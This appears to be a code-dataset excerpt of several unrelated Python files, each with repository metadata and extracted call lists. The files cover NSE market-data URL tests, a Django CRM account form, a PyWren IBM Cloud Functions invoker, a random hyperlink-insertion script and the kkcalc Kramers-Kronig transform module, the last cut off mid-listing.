= index_history_url(indexType='NIFTY 50', fromDate='01-01-2015', toDate='10-01-2015') self.assertGreaterEqual(resp.text.find('High'), 0) self.assertGreaterEqual(resp.text.find('Low'), 0) def test_index_daily_snapshot_url(self): resp = index_daily_snapshot_url('06012020') csv = str(resp.content) self.assertGreaterEqual(csv.find('Nifty 50'), 0) self.assertGreaterEqual(csv.find('Nifty IT'), 0) self.assertGreaterEqual(csv.find('Nifty Bank'), 0) self.assertGreaterEqual(csv.find('Nifty Next 50'), 0) def test_index_pe_history_url(self): resp = index_pe_history_url(fromDate='01-01-2015', toDate='10-01-2015', indexName='NIFTY 50') self.assertGreaterEqual(resp.text.find('<th>P/E'), 0) self.assertGreaterEqual(resp.text.find('<th>P/B'), 0) def test_index_vix_history_url(self): resp = index_vix_history_url(fromDate='01-Jan-2015', toDate='10-Jan-2015', ) self.assertGreaterEqual(resp.text.find('VIX'), 0) self.assertGreaterEqual(resp.text.find('Change'), 0) def test_derivative_derivative_expiry_dates_url(self): resp = derivative_expiry_dates_url() self.assertGreaterEqual(resp.text.find('vixExpryDt'), 0) def test_derivative_history_url(self): resp = derivative_history_url(instrumentType='FUTIDX', symbol='NIFTY', expiryDate='26-12-2019', optionType='select', strikePrice='', dateRange='', fromDate='25-Dec-2019', toDate='26-Dec-2019') self.assertGreaterEqual(resp.text.find('NIFTY'), 0) self.assertGreaterEqual(resp.text.find('Expiry'), 0) def test_derivative_price_list_url(self): resp = derivative_price_list_url('2019', 'JUL', '19JUL2019') csv = unzip_str(resp.content) def tearDown(self): super().tearDown() if __name__ == '__main__': suite = unittest.TestLoader().loadTestsFromTestCase(TestUrls) result = unittest.TextTestRunner(verbosity=2).run(suite) if six.PY2: if result.wasSuccessful(): print('tests OK') for (test, error) in result.errors: print('=========Error in: %s===========' % test) print(error) print('======================================') for (test, failures) in result.failures: print('=========Error in: %s===========' % test) print(failures) print('======================================')
[((27, 6, 27, 68), 'nseta.common.urls.session.proxies.update', 'urls.session.proxies.update', ({(27, 34, 27, 67): "{'http': 'proxy1.wipro.com:8080'}"}, {}), "({'http': 'proxy1.wipro.com:8080'})", True, 'import nseta.common.urls as urls\n'), ((123, 10, 123, 31), 'unittest.TestLoader', 'unittest.TestLoader', ({}, {}), '()', False, 'import unittest\n'), ((124, 11, 124, 47), 'unittest.TextTestRunner', 'unittest.TextTestRunner', (), '', False, 'import unittest\n')]
cheradenine/Django-CRM
accounts/forms.py
692572ced050d314c1f880af8b4000c97cbf7440
from django import forms from .models import Account from common.models import Comment, Attachments from leads.models import Lead from contacts.models import Contact from django.db.models import Q class AccountForm(forms.ModelForm): def __init__(self, *args, **kwargs): account_view = kwargs.pop('account', False) request_user = kwargs.pop('request_user', None) super(AccountForm, self).__init__(*args, **kwargs) for field in self.fields.values(): field.widget.attrs = {"class": "form-control"} self.fields['description'].widget.attrs.update({'rows': '8'}) self.fields['status'].choices = [ (each[0], each[1]) for each in Account.ACCOUNT_STATUS_CHOICE] self.fields['status'].required = False for key, value in self.fields.items(): if key == 'phone': value.widget.attrs['placeholder'] = "+91-123-456-7890" else: value.widget.attrs['placeholder'] = value.label self.fields['billing_address_line'].widget.attrs.update({ 'placeholder': 'Address Line'}) self.fields['billing_street'].widget.attrs.update({ 'placeholder': 'Street'}) self.fields['billing_city'].widget.attrs.update({ 'placeholder': 'City'}) self.fields['billing_state'].widget.attrs.update({ 'placeholder': 'State'}) self.fields['billing_postcode'].widget.attrs.update({ 'placeholder': 'Postcode'}) self.fields["billing_country"].choices = [ ("", "--Country--"), ] + list(self.fields["billing_country"].choices)[1:] self.fields["lead"].queryset = Lead.objects.all( ).exclude(status='closed') if request_user: self.fields["lead"].queryset = Lead.objects.filter( Q(assigned_to__in=[request_user]) | Q(created_by=request_user)).exclude(status='closed') self.fields["contacts"].queryset = Contact.objects.filter( Q(assigned_to__in=[request_user]) | Q(created_by=request_user)) if account_view: self.fields['billing_address_line'].required = True self.fields['billing_street'].required = True self.fields['billing_city'].required = True self.fields['billing_state'].required = True self.fields['billing_postcode'].required = True self.fields['billing_country'].required = True class Meta: model = Account fields = ('name', 'phone', 'email', 'website', 'industry', 'description', 'status', 'billing_address_line', 'billing_street', 'billing_city', 'billing_state', 'billing_postcode', 'billing_country', 'lead', 'contacts') class AccountCommentForm(forms.ModelForm): comment = forms.CharField(max_length=64, required=True) class Meta: model = Comment fields = ('comment', 'account', 'commented_by') class AccountAttachmentForm(forms.ModelForm): attachment = forms.FileField(max_length=1001, required=True) class Meta: model = Attachments fields = ('attachment', 'account')
[((65, 14, 65, 59), 'django.forms.CharField', 'forms.CharField', (), '', False, 'from django import forms\n'), ((73, 17, 73, 64), 'django.forms.FileField', 'forms.FileField', (), '', False, 'from django import forms\n'), ((39, 39, 40, 9), 'leads.models.Lead.objects.all', 'Lead.objects.all', ({}, {}), '()', False, 'from leads.models import Lead\n'), ((45, 16, 45, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((45, 52, 45, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 16, 43, 49), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n'), ((43, 52, 43, 78), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q\n')]
thetolga/pywren-ibm-cloud
pywren/pywren_ibm_cloud/invokers.py
ce48c158cf469b55100ab68a75d3dcd6ae9a3ffe
# # Copyright 2018 PyWren Team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import time import logging import random from pywren_ibm_cloud.cf_connector import CloudFunctions logger = logging.getLogger(__name__) class IBMCloudFunctionsInvoker: def __init__(self, cf_config, retry_config): self.namespace = cf_config['namespace'] self.endpoint = cf_config['endpoint'] self.cf_action_name = cf_config['action_name'] # Runtime self.invocation_retry = retry_config['invocation_retry'] self.retry_sleeps = retry_config['retry_sleeps'] self.retries = retry_config['retries'] self.client = CloudFunctions(cf_config) log_msg = 'IBM Cloud Functions init for {}'.format(self.cf_action_name) logger.info(log_msg) if(logger.getEffectiveLevel() == logging.WARNING): print(log_msg) def invoke(self, payload): """ Invoke -- return information about this invocation """ act_id = self.client.invoke(self.cf_action_name, payload) attempts = 1 while not act_id and self.invocation_retry and attempts < self.retries: attempts += 1 selected_sleep = random.choice(self.retry_sleeps) exec_id = payload['executor_id'] call_id = payload['call_id'] log_msg = ('Executor ID {} Function {} - Invocation failed - retry {} in {} seconds'.format(exec_id, call_id, attempts, selected_sleep)) logger.debug(log_msg) time.sleep(selected_sleep) act_id = self.client.invoke(self.cf_action_name, payload) return act_id def config(self): """ Return config dict """ return {'cf_action_name': self.cf_action_name, 'cf_namespace': self.namespace, 'cf_endpoint': self.endpoint}
[((22, 9, 22, 36), 'logging.getLogger', 'logging.getLogger', ({(22, 27, 22, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((34, 22, 34, 47), 'pywren_ibm_cloud.cf_connector.CloudFunctions', 'CloudFunctions', ({(34, 37, 34, 46): 'cf_config'}, {}), '(cf_config)', False, 'from pywren_ibm_cloud.cf_connector import CloudFunctions\n'), ((50, 29, 50, 61), 'random.choice', 'random.choice', ({(50, 43, 50, 60): 'self.retry_sleeps'}, {}), '(self.retry_sleeps)', False, 'import random\n'), ((57, 12, 57, 38), 'time.sleep', 'time.sleep', ({(57, 23, 57, 37): 'selected_sleep'}, {}), '(selected_sleep)', False, 'import time\n')]
Arugakente/DataScienceP1
Projet1/Dataset/addlinkRealExample.py
94ca874ed8a76a89a3da9ecf2fe6e554700f0507
import os import random inputDirectory = "./original" outputDirectory = "./processed" #probability parameters TopLevel = 0.6 SecondLevel = 0.5 ThirdLevel = 0.4 FourAndAbove = 0.2 pickInside = 0.5 pickOutside = 0.25 topics = [] siteLevel = [] fileStructure = [] count = 0 def findPossibleIndex(toParse): toReturn = [] for current in range(0,len(toParse)): if toParse[current] == " ": toReturn.append(current) toReturn.append(len(toParse)) return toReturn def manageFile(inputPath,outputPath,topicIndex,currentLevel,filename): count = 0 content = open(inputPath , 'r') output = open(outputPath ,"w") currentLine = content.readline() outputFile = "" while currentLine: currentLine = content.readline() randomPick = random.uniform(0.0,2.0) if randomPick <= pickInside+pickOutside : possibleIndexes = findPossibleIndex(currentLine) insertPosition = possibleIndexes[random.randint(0,len(possibleIndexes)-1)] selectedTopic = topicIndex if(randomPick<=pickOutside): while(selectedTopic == topicIndex): selectedTopic = random.randint(0,len(topics)-1) randomPick = random.uniform(0.0,4.0) if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove): selectedLevel = 0 if(randomPick <= TopLevel): selectedLevel = 1 if(randomPick <= TopLevel+ SecondLevel and randomPick > TopLevel): selectedLevel = 2 if(randomPick <= TopLevel + SecondLevel + ThirdLevel and randomPick > TopLevel+ SecondLevel): selectedLevel = 3 if(randomPick <= TopLevel + SecondLevel + ThirdLevel + FourAndAbove and randomPick > TopLevel + SecondLevel + ThirdLevel): if(len(siteLevel[selectedTopic]) == 4): selectedLevel = 4 else: selectedLevel = random.randint(4,len(siteLevel[selectedTopic])) i = 0 found = False while i<len(siteLevel[selectedTopic]): if siteLevel[selectedTopic][i] == str(selectedLevel)+"grade": found = True selectedLevel = i i+=1 if(selectedLevel>=currentLevel): fileLink = filename while(fileLink == filename): fileLink = fileStructure[selectedTopic][selectedLevel][random.randint(0,len(fileStructure[selectedTopic][selectedLevel])-1)] fileLink = " linkTo:"+fileLink count += 1 print(count) if insertPosition == len(currentLine): currentLine += fileLink else: currentLine = currentLine[0:insertPosition]+fileLink+currentLine[insertPosition:] outputFile += currentLine output.write(outputFile) return count topicIndex=0 for foldername in os.listdir(inputDirectory) : if(foldername[0] != "."): topics.append(foldername) siteLevel.append([]) fileStructure.append([]) levelIndex=0 for categoryName in os.listdir(inputDirectory+"/"+foldername): if(categoryName[0] != "."): siteLevel[topicIndex].append(categoryName) fileStructure[topicIndex].append([]) for filename in os.listdir(inputDirectory+"/"+foldername+"/"+categoryName): if(filename[0] != "."): fileStructure[topicIndex][levelIndex].append(filename) levelIndex += 1 topicIndex += 1 for i in range(0,len(topics)): for j in range(0,len(siteLevel[i])): for k in range(0,len(fileStructure[i][j])): count += manageFile(inputDirectory+"/"+topics[i]+"/"+siteLevel[i][j]+"/"+fileStructure[i][j][k],outputDirectory+"/"+fileStructure[i][j][k],i,j,fileStructure[i][j][k]) print(str(count)+" liens créés")
[((94, 18, 94, 44), 'os.listdir', 'os.listdir', ({(94, 29, 94, 43): 'inputDirectory'}, {}), '(inputDirectory)', False, 'import os\n'), ((41, 21, 41, 44), 'random.uniform', 'random.uniform', ({(41, 36, 41, 39): '0.0', (41, 40, 41, 43): '2.0'}, {}), '(0.0, 2.0)', False, 'import random\n'), ((104, 28, 104, 69), 'os.listdir', 'os.listdir', ({(104, 39, 104, 68): "(inputDirectory + '/' + foldername)"}, {}), "(inputDirectory + '/' + foldername)", False, 'import os\n'), ((52, 25, 52, 48), 'random.uniform', 'random.uniform', ({(52, 40, 52, 43): '0.0', (52, 44, 52, 47): '4.0'}, {}), '(0.0, 4.0)', False, 'import random\n'), ((110, 32, 110, 90), 'os.listdir', 'os.listdir', ({(110, 43, 110, 89): "(inputDirectory + '/' + foldername + '/' + categoryName)"}, {}), "(inputDirectory + '/' + foldername + '/' + categoryName)", False, 'import os\n')]
benajamin/kkcalc
kkcalc/kk.py
fcabfba288442dd297e3bd9910062c5db2231a91
#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Kramers-Kronig Calculator software package. # # Copyright (c) 2013 Benjamin Watts, Daniel J. Lauk # # The software is licensed under the terms of the zlib/libpng license. # For details see LICENSE.txt """This module implements the Kramers-Kronig transformation.""" import logging, sys logger = logging.getLogger(__name__) if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) logging.StreamHandler(stream=sys.stdout) import math import numpy import os import data def calc_relativistic_correction(stoichiometry): """Calculate the relativistic correction to the Kramers-Kronig transform. Parameters: ----------- stoichiometry : array of integer/float pairs Each pair in the list consists of an atomic number and the relative proportion of that element. Returns ------- This function returns a ``float`` holding the relativistic corection to the Kramers-Kronig transform. """ correction = 0 for z, n in stoichiometry: correction += (z - (z/82.5)**2.37) * n return correction def KK_General_PP(Eval_Energy, Energy, imaginary_spectrum, orders, relativistic_correction): """Calculate Kramers-Kronig transform with "Piecewise Polynomial" algorithm plus the Biggs and Lighthill extended data. Parameters ---------- Eval_Energy : numpy vector of `float` Set of photon energies describing points at which to evaluate the real spectrum Energy : numpy vector of `float` Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid imaginary_spectrum : two-dimensional `numpy.array` of `float` The array consists of columns of polynomial coefficients belonging to the power terms indicated by 'order' orders : numpy vector of integers The vector represents the polynomial indices corresponding to the columns of imaginary_spectrum relativistic_correction : float The relativistic correction to the Kramers-Kronig transform. You can calculate the value using the `calc_relativistic_correction` function. Returns ------- This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy. """ logger = logging.getLogger(__name__) logger.info("Calculate Kramers-Kronig transform using general piecewise-polynomial algorithm") # Need to build x-E-n arrays X = numpy.tile(Energy[:,numpy.newaxis,numpy.newaxis],(1,len(Eval_Energy),len(orders))) E = numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy)-1,1,len(orders))) C = numpy.tile(imaginary_spectrum[:,numpy.newaxis,:],(1,len(Eval_Energy),1)) N = numpy.tile(orders[numpy.newaxis,numpy.newaxis,:],(len(Energy)-1,len(Eval_Energy),1)) poles = numpy.equal(X,numpy.tile(Eval_Energy[numpy.newaxis,:,numpy.newaxis],(len(Energy),1,len(orders)))) # all N, ln(x+E) and ln(x-E) terms and poles Integral = numpy.sum(-C*(-E)**N*numpy.log(numpy.absolute((X[1:,:,:]+E)/(X[:-1,:,:]+E)))-C*E**N*(1-poles[1:,:,:])*numpy.log(numpy.absolute((X[1:,:,:]-E+poles[1:,:,:])/((1-poles[:-1,:,:])*X[:-1,:,:]+poles[:-1,:,:]*X[[0]+list(range(len(Energy)-2)),:,:]-E))),axis=(0,2)) if numpy.any(orders<=-2): # N<=-2, ln(x) terms i = [slice(None,None,None),slice(None,None,None),orders<=-2] Integral += numpy.sum(C[i]*((-E[i])**N[i]+E[i]**N[i])*numpy.log(numpy.absolute((X[1:,:,orders<=-2])/(X[:-1,:,orders<=-2]))),axis=(0,2)) if numpy.any(orders>=0): # N>=0, x^k terms for ni in numpy.where(orders>=0)[0]: i = [slice(None,None,None),slice(None,None,None),ni] n = orders[ni] for k in range(n,0,-2): Integral += numpy.sum(C[i]/float(-k)*2*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0) if numpy.any(orders <=-3): # N<=-3, x^k terms for ni in numpy.where(orders<=-3)[0]: i = [slice(None,None,None),slice(None,None,None),ni] n = orders[ni] for k in range(n+2,0,2): Integral += numpy.sum(C[i]/float(k)*((-1)**(n-k)+1)*E[i]**(n-k)*(X[1:,:,ni]**k-X[:-1,:,ni]**k),axis=0) logger.debug("Done!") return Integral / math.pi + relativistic_correction def KK_PP(Eval_Energy, Energy, imaginary_spectrum, relativistic_correction): """Calculate Kramers-Kronig transform with "Piecewise Polynomial" algorithm plus the Biggs and Lighthill extended data. Parameters ---------- Eval_Energy : numpy vector of `float` Set of photon energies describing points at which to evaluate the real spectrum Energy : numpy vector of `float` Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid imaginary_spectrum : two-dimensional `numpy.array` of `float` The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3 relativistic_correction : float The relativistic correction to the Kramers-Kronig transform. You can calculate the value using the `calc_relativistic_correction` function. Returns ------- This function returns the real part of the scattering factors evaluated at photon energies specified by Eval_Energy. """ logger = logging.getLogger(__name__) logger.info("Calculate Kramers-Kronig transform using (n from 1 to -3) piecewise-polynomial algorithm") X1 = Energy[0:-1] X2 = Energy[1:] E = numpy.tile(Eval_Energy, (len(Energy)-1, 1)).T Full_coeffs = imaginary_spectrum.T Symb_1 = (( Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)-(Full_coeffs[3, :]/E+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))+Full_coeffs[4, :]/E*(X2**-1-X1**-1)) Symb_2 = ((-Full_coeffs[0, :]*E+Full_coeffs[1, :])*(X2-X1)+0.5*Full_coeffs[0, :]*(X2**2-X1**2)+(Full_coeffs[3, :]/E-Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute(X2/X1))-Full_coeffs[4, :]/E*(X2**-1-X1**-1))+(Full_coeffs[0, :]*E**2-Full_coeffs[1, :]*E+Full_coeffs[2, :]-Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2+E)/(X1+E))) Symb_3 = (1-1*((X2==E)|(X1==E)))*(Full_coeffs[0, :]*E**2+Full_coeffs[1, :]*E+Full_coeffs[2, :]+Full_coeffs[3, :]*E**-1+Full_coeffs[4, :]*E**-2)*numpy.log(numpy.absolute((X2-E+1*(X2==E))/(X1-E+1*(X1==E)))) Symb_B = numpy.sum(Symb_2 - Symb_1 - Symb_3, axis=1) # Sum areas for approximate integral # Patch singularities hits = Energy[1:-1]==E[:,0:-1] E_hits = numpy.append(numpy.insert(numpy.any(hits, axis=0),[0,0],False),[False,False]) Eval_hits = numpy.any(hits, axis=1) X1 = Energy[E_hits[2:]] XE = Energy[E_hits[1:-1]] X2 = Energy[E_hits[:-2]] C1 = Full_coeffs[:, E_hits[2:-1]] C2 = Full_coeffs[:, E_hits[1:-2]] Symb_singularities = numpy.zeros(len(Eval_Energy)) Symb_singularities[Eval_hits] = (C2[0, :]*XE**2+C2[1, :]*XE+C2[2, :]+C2[3, :]*XE**-1+C2[4, :]*XE**-2)*numpy.log(numpy.absolute((X2-XE)/(X1-XE))) # Finish things off KK_Re = (Symb_B-Symb_singularities) / (math.pi*Eval_Energy) + relativistic_correction logger.debug("Done!") return KK_Re def improve_accuracy(Full_E, Real_Spectrum, Imaginary_Spectrum, relativistic_correction, tolerance, recursion=50): """Calculate extra data points so that a linear interpolation is more accurate. Parameters ---------- Full_E : numpy vector of `float` Set of photon energies describing intervals for which each row of `imaginary_spectrum` is valid Real_Spectrum : numpy vector of `float` The real part of the spectrum corresponding to magnitudes at photon energies in Full_E Imaginary_Spectrum : two-dimensional `numpy.array` of `float` The array consists of five columns of polynomial coefficients: A_1, A_0, A_-1, A_-2, A_-3 relativistic_correction : float The relativistic correction to the Kramers-Kronig transform. (You can calculate the value using the `calc_relativistic_correction` function.) tolerance : float Level of error in linear extrapolation of data values to be allowed. recursion : integer Number of times an energy interval can be halved before giving up. Returns ------- This function returns a numpy array with three columns respectively representing photon energy, the real spectrum and the imaginary spectrum. """ logger.debug("Improve data accuracy") new_points = numpy.cumsum(numpy.ones((len(Full_E)-2,1),dtype=numpy.int8))+1 Im_values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1]))) #plot_Im_values = Im_values Re_values = Real_Spectrum E_values = Full_E temp_Im_spectrum = Imaginary_Spectrum[1:] count = 0 improved = 1 total_improved_points = 0 while count<recursion and numpy.sum(improved)>0: #get E_midpoints midpoints = (E_values[new_points-1]+E_values[new_points])/2. #evaluate at new points Im_midpoints = data.coeffs_to_ASF(midpoints, temp_Im_spectrum) Re_midpoints = KK_PP(midpoints, Full_E, Imaginary_Spectrum, relativistic_correction) #evaluate error levels Im_error = abs((Im_values[new_points-1]+Im_values[new_points])/2. - Im_midpoints) Re_error = abs((Re_values[new_points-1]+Re_values[new_points])/2. - Re_midpoints) improved = (Im_error>tolerance) | (Re_error>tolerance) logger.debug(str(numpy.sum(improved))+" points (out of "+str(len(improved))+") can be improved in pass number "+str(count+1)+".") total_improved_points += numpy.sum(improved) #insert new points and values Im_values = numpy.insert(Im_values,new_points[improved],Im_midpoints[improved]) Re_values = numpy.insert(Re_values,new_points[improved],Re_midpoints[improved]) E_values = numpy.insert(E_values,new_points[improved],midpoints[improved]) #prepare for next loop temp_Im_spectrum =numpy.repeat(temp_Im_spectrum[improved],2,axis=0) new_points = numpy.where(numpy.insert(numpy.zeros(Im_values.shape, dtype=numpy.bool),new_points[improved],True))[0] new_points = numpy.vstack((new_points, new_points+1)).T.flatten() count += 1 #import matplotlib #matplotlib.use('WXAgg') #import pylab #pylab.figure() #pylab.plot(Full_E,plot_Im_values,'ok') #pylab.plot(Full_E,Real_Spectrum,'og') #pylab.plot(midpoints,Im_midpoints,'+b') #pylab.plot(midpoints,Re_midpoints,'+r') #pylab.plot(E_values,Im_values,'b-') #pylab.plot(E_values,Re_values,'r-') #pylab.plot(midpoints,Im_error,'b-') #pylab.plot(midpoints,Re_error,'r-') #pylab.xscale('log') #pylab.show() logger.info("Improved data accuracy by inserting "+str(total_improved_points)+" extra points.") return numpy.vstack((E_values,Re_values,Im_values)).T def kk_calculate_real(NearEdgeDataFile, ChemicalFormula, load_options=None, input_data_type=None, merge_points=None, add_background=False, fix_distortions=False, curve_tolerance=None, curve_recursion=50): """Do all data loading and processing and then calculate the kramers-Kronig transform. Parameters ---------- NearEdgeDataFile : string Path to file containg near-edge data ChemicalFormula : string A standard chemical formula string consisting of element symbols, numbers and parentheses. merge_points : list or tuple pair of `float` values, or None The photon energy values (low, high) at which the near-edge and scattering factor data values are set equal so as to ensure continuity of the merged data set. Returns ------- This function returns a numpy array with columns consisting of the photon energy, the real and the imaginary parts of the scattering factors. """ Stoichiometry = data.ParseChemicalFormula(ChemicalFormula) Relativistic_Correction = calc_relativistic_correction(Stoichiometry) Full_E, Imaginary_Spectrum = data.calculate_asf(Stoichiometry) if NearEdgeDataFile is not None: NearEdge_Data = data.convert_data(data.load_data(NearEdgeDataFile, load_options),FromType=input_data_type,ToType='asf') Full_E, Imaginary_Spectrum = data.merge_spectra(NearEdge_Data, Full_E, Imaginary_Spectrum, merge_points=merge_points, add_background=add_background, fix_distortions=fix_distortions) Real_Spectrum = KK_PP(Full_E, Full_E, Imaginary_Spectrum, Relativistic_Correction) if curve_tolerance is not None: output_data = improve_accuracy(Full_E,Real_Spectrum,Imaginary_Spectrum, Relativistic_Correction, curve_tolerance, curve_recursion) else: Imaginary_Spectrum_Values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1]))) output_data = numpy.vstack((Full_E,Real_Spectrum,Imaginary_Spectrum_Values)).T return output_data if __name__ == '__main__': #use argparse here to get command line arguments #process arguments and pass to a pythonic function #I will abuse this section of code for initial testing #Output = kk_calculate_real('../../data/Xy_norm_bgsub.txt', 'C10SH14', input_data_type='NEXAFS') Output = kk_calculate_real('../../data/LaAlO3/LaAlO3_Exp.csv', 'LaAlO3', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05) #Output = kk_calculate_real('../../data/GaAs/As.xmu.csv', 'GaAs', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05) Stoichiometry = data.ParseChemicalFormula('LaAlO3') #Stoichiometry = data.ParseChemicalFormula('GaAs') Relativistic_Correction = calc_relativistic_correction(Stoichiometry) ASF_E, ASF_Data = data.calculate_asf(Stoichiometry) ASF_Data3 = data.coeffs_to_linear(ASF_E, ASF_Data, 0.1) ASF_Data2 = data.coeffs_to_ASF(ASF_E, numpy.vstack((ASF_Data,ASF_Data[-1]))) #Test_E = (Output[1:,0]+Output[0:-1,0])*0.5 #Test_E = numpy.linspace(41257.87,41259.87,num=21) #Real_Spectrum2 = KK_PP(Test_E, Output[:,0], Im, Relativistic_Correction) import matplotlib matplotlib.use('WXAgg') import pylab pylab.figure() pylab.plot(Output[:,0],Output[:,1],'xg-',Output[:,0],Output[:,2],'xb-') pylab.plot(ASF_E,ASF_Data2,'+r') #pylab.plot(ASF_E,ASF_Data22,'xr') pylab.plot(ASF_Data3[0],ASF_Data3[1],'r-') #pylab.plot(Test_E,Real_Spectrum2,'*y') pylab.xscale('log') pylab.show()
[((14, 9, 14, 36), 'logging.getLogger', 'logging.getLogger', ({(14, 27, 14, 35): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((16, 1, 16, 41), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging, sys\n'), ((17, 1, 17, 41), 'logging.StreamHandler', 'logging.StreamHandler', (), '', False, 'import logging, sys\n'), ((68, 10, 68, 37), 'logging.getLogger', 'logging.getLogger', ({(68, 28, 68, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((80, 4, 80, 25), 'numpy.any', 'numpy.any', ({(80, 14, 80, 24): '(orders <= -2)'}, {}), '(orders <= -2)', False, 'import numpy\n'), ((84, 4, 84, 24), 'numpy.any', 'numpy.any', ({(84, 14, 84, 23): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((91, 4, 91, 26), 'numpy.any', 'numpy.any', ({(91, 14, 91, 25): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((122, 10, 122, 37), 'logging.getLogger', 'logging.getLogger', ({(122, 28, 122, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((131, 10, 131, 53), 'numpy.sum', 'numpy.sum', (), '', False, 'import numpy\n'), ((135, 13, 135, 36), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((236, 17, 236, 59), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(236, 43, 236, 58): 'ChemicalFormula'}, {}), '(ChemicalFormula)', False, 'import data\n'), ((238, 30, 238, 63), 'data.calculate_asf', 'data.calculate_asf', ({(238, 49, 238, 62): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((259, 17, 259, 52), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(259, 43, 259, 51): '"""LaAlO3"""'}, {}), "('LaAlO3')", False, 'import data\n'), ((262, 19, 262, 52), 'data.calculate_asf', 'data.calculate_asf', ({(262, 38, 262, 51): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((263, 13, 263, 56), 'data.coeffs_to_linear', 'data.coeffs_to_linear', ({(263, 35, 263, 40): 'ASF_E', (263, 42, 263, 50): 'ASF_Data', (263, 52, 263, 55): '0.1'}, {}), '(ASF_E, ASF_Data, 0.1)', False, 'import data\n'), ((272, 1, 272, 24), 'matplotlib.use', 'matplotlib.use', ({(272, 16, 272, 23): '"""WXAgg"""'}, {}), "('WXAgg')", False, 'import matplotlib\n'), ((275, 1, 275, 15), 'pylab.figure', 'pylab.figure', ({}, {}), '()', False, 'import pylab\n'), ((276, 1, 276, 72), 'pylab.plot', 'pylab.plot', ({(276, 12, 276, 23): 'Output[:, (0)]', (276, 24, 276, 35): 'Output[:, (1)]', (276, 36, 276, 41): '"""xg-"""', (276, 42, 276, 53): 'Output[:, (0)]', (276, 54, 276, 65): 'Output[:, (2)]', (276, 66, 276, 71): '"""xb-"""'}, {}), "(Output[:, (0)], Output[:, (1)], 'xg-', Output[:, (0)], Output[:,\n (2)], 'xb-')", False, 'import pylab\n'), ((277, 1, 277, 33), 'pylab.plot', 'pylab.plot', ({(277, 12, 277, 17): 'ASF_E', (277, 18, 277, 27): 'ASF_Data2', (277, 28, 277, 32): '"""+r"""'}, {}), "(ASF_E, ASF_Data2, '+r')", False, 'import pylab\n'), ((279, 1, 279, 43), 'pylab.plot', 'pylab.plot', ({(279, 12, 279, 24): 'ASF_Data3[0]', (279, 25, 279, 37): 'ASF_Data3[1]', (279, 38, 279, 42): '"""r-"""'}, {}), "(ASF_Data3[0], ASF_Data3[1], 'r-')", False, 'import pylab\n'), ((281, 1, 281, 20), 'pylab.xscale', 'pylab.xscale', ({(281, 14, 281, 19): '"""log"""'}, {}), "('log')", False, 'import pylab\n'), ((282, 1, 282, 13), 'pylab.show', 'pylab.show', ({}, {}), '()', False, 'import pylab\n'), ((173, 40, 173, 97), 'numpy.vstack', 'numpy.vstack', ({(173, 53, 173, 96): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((185, 17, 185, 64), 'data.coeffs_to_ASF', 'data.coeffs_to_ASF', ({(185, 36, 185, 45): 'midpoints', (185, 47, 185, 63): 'temp_Im_spectrum'}, {}), '(midpoints, temp_Im_spectrum)', False, 'import data\n'), ((192, 27, 192, 46), 'numpy.sum', 'numpy.sum', ({(192, 37, 192, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((194, 14, 194, 81), 'numpy.insert', 'numpy.insert', ({(194, 27, 194, 36): 'Im_values', (194, 37, 194, 57): 'new_points[improved]', (194, 58, 194, 80): 'Im_midpoints[improved]'}, {}), '(Im_values, new_points[improved], Im_midpoints[improved])', False, 'import numpy\n'), ((195, 14, 195, 81), 'numpy.insert', 'numpy.insert', ({(195, 27, 195, 36): 'Re_values', (195, 37, 195, 57): 'new_points[improved]', (195, 58, 195, 80): 'Re_midpoints[improved]'}, {}), '(Re_values, new_points[improved], Re_midpoints[improved])', False, 'import numpy\n'), ((196, 13, 196, 76), 'numpy.insert', 'numpy.insert', ({(196, 26, 196, 34): 'E_values', (196, 35, 196, 55): 'new_points[improved]', (196, 56, 196, 75): 'midpoints[improved]'}, {}), '(E_values, new_points[improved], midpoints[improved])', False, 'import numpy\n'), ((198, 